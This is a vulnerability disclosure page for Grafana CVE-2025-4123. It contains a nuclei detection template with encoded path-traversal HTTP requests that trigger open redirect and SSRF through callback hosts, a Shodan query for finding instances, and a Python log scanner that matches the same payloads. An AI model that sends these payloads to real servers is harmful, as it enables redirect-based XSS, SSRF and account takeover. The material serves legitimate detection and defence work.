
Grafana - XSS / Open Redirect / SSRF via Client Path Traversal

CVE-2025-4123
Verified

Description

An open redirect in Grafana, reached through client-side path traversal, can be chained with other issues such as XSS or SSRF to increase its impact. An attacker may use the redirect to reach internal services or to deliver malicious JavaScript, potentially leading to internal data exposure or account takeover.

Severity

High

CVSS Score

7.6

Exploit Probability

8%

Published Date

May 22, 2025

Template Author

iamnoooob, rootxharsh, pdresearch

CVE-2025-4123.yaml
id: CVE-2025-4123

info:
  name: Grafana - XSS / Open Redirect / SSRF via Client Path Traversal
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    An open redirect vulnerability in Grafana can be chained with other issues, such as XSS or SSRF, to increase impact. An attacker may exploit the redirect to target internal services or deliver malicious JavaScript, potentially leading to internal data exposure or account takeover.
  impact: |
    Attackers can exploit path traversal to achieve open redirect, XSS, or SSRF attacks, potentially leading to internal data exposure or account takeover.
  remediation: |
    Upgrade Grafana to the latest version that properly validates and sanitizes file paths in the render endpoint.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L
    cvss-score: 7.6
    cve-id: CVE-2025-4123
    cwe-id: CWE-79,CWE-601
    epss-score: 0.08371
    epss-percentile: 0.91989
  reference:
    - https://medium.com/@Nightbloodz/grafana-cve-2025-4123-full-read-ssrf-account-takeover-d12abd13cd53
    - https://grafana.com/blog/2025/05/21/grafana-security-release-high-severity-security-fix-for-cve-2025-4123/
  metadata:
    verified: true
    max-request: 1
    shodan-query: product:"Grafana"
    fofa-query: app="Grafana"
  tags: cve,cve2025,grafana,redirect,unauth,oss,vkev,vuln

http:
  - raw:
      - |
        GET /render/public/..%252f%255C{{interactsh-url}}%252f%253F%252f..%252f.. HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /public/..%2F%5coast.pro%2F%3f%2F..%2F.. HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        name: open-redirect
        dsl:
          - status_code == 302 && contains(location, '/\\oast.pro/?/../../')

      - type: dsl
        name: ssrf
        dsl:
          - contains(interactsh_protocol, 'dns') && contains(content_type, 'image/png')
# digest: 4b0a00483046022100e0b4bd6ae2abb6c3fa15809cc809b9e6224080517840ee6ae75e0b9137e95155022100e0fe62efaeb26bd80201786ec509f2ceae4e0bb1b2aa145e4ee0d2f3f3d8384d:922c64590222798bb761d5b6d8e72950
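As an added detection example (not part of the nuclei template above and not Grafana's own code): a small Python scanner that flags access-log requests whose path, once percent-decoded, targets the /public/ or /render/public/ prefixes used in the template's requests and contains a traversal sequence ("../" or "..\") or a scheme-relative host segment ("/\host"). Decoding is applied repeatedly because the first request in the template double-encodes its separators (%252f). The log lines, the client address and the host example.invalid are constructed for this example; the detection is based solely on the request shapes shown in the template.

```python
import re
from urllib.parse import unquote

# Request-line pattern for common/combined access-log format (assumption for this example).
LOG_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Grafana static-asset prefixes named in the template's two requests.
WATCHED_PREFIXES = ('/public/', '/render/public/')


def fully_decode(path: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (bounded to max_rounds).

    The first request in the template uses %252f, i.e. '/' encoded twice,
    so a single unquote() would leave '%2f' behind and miss the traversal.
    """
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def is_suspicious(request_path: str) -> bool:
    """True when a decoded request under a watched prefix contains traversal
    ('../' or '..\\') or a scheme-relative host segment ('/\\host')."""
    decoded = fully_decode(request_path)
    if not decoded.lower().startswith(WATCHED_PREFIXES):
        return False
    return '../' in decoded or '..\\' in decoded or '/\\' in decoded


def scan_log_lines(lines):
    """Return (line_number, status, decoded_path) for every suspicious request line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = LOG_LINE.search(line)
        if match and is_suspicious(match.group('path')):
            hits.append((number, int(match.group('status')),
                         fully_decode(match.group('path'))))
    return hits


# Constructed sample log lines; example.invalid stands in for an attacker-controlled host.
SAMPLE_LOG = [
    '203.0.113.5 - - [22/May/2025:10:00:01 +0000] "GET /public/img/grafana_icon.svg HTTP/1.1" 200 3561',
    '203.0.113.5 - - [22/May/2025:10:00:02 +0000] "GET /public/..%2F%5cexample.invalid%2F%3f%2F..%2F.. HTTP/1.1" 302 0',
    '203.0.113.5 - - [22/May/2025:10:00:03 +0000] "GET /render/public/..%252f%255Cexample.invalid%252f%253F%252f..%252f.. HTTP/1.1" 200 0',
    '203.0.113.5 - - [22/May/2025:10:00:04 +0000] "GET /api/health HTTP/1.1" 200 60',
]

if __name__ == '__main__':
    for number, status, path in scan_log_lines(SAMPLE_LOG):
        print(f'line {number}: status {status}, decoded path {path}')
```

Matching on the decoded path rather than the raw one is the point: a rule that only looks for the literal "../" misses both encoded forms, while a bounded decode loop catches single and double encoding without looping forever on malformed input. A 302 on a watched prefix, as in the second sample line, is the open-redirect case from the template's first matcher; a 200 with an image response on /render/public/ corresponds to the SSRF case its second matcher looks for.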

CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L
CVE ID: CVE-2025-4123
CWE ID: CWE-79, CWE-601

References

https://medium.com/@Nightbloodz/grafana-cve-2025-4123-full-read-ssrf-account-takeover-d12abd13cd53
https://grafana.com/blog/2025/05/21/grafana-security-release-high-severity-security-fix-for-cve-2025-4123/

Remediation Steps

Upgrade Grafana to the latest version that properly validates and sanitizes file paths in the render endpoint.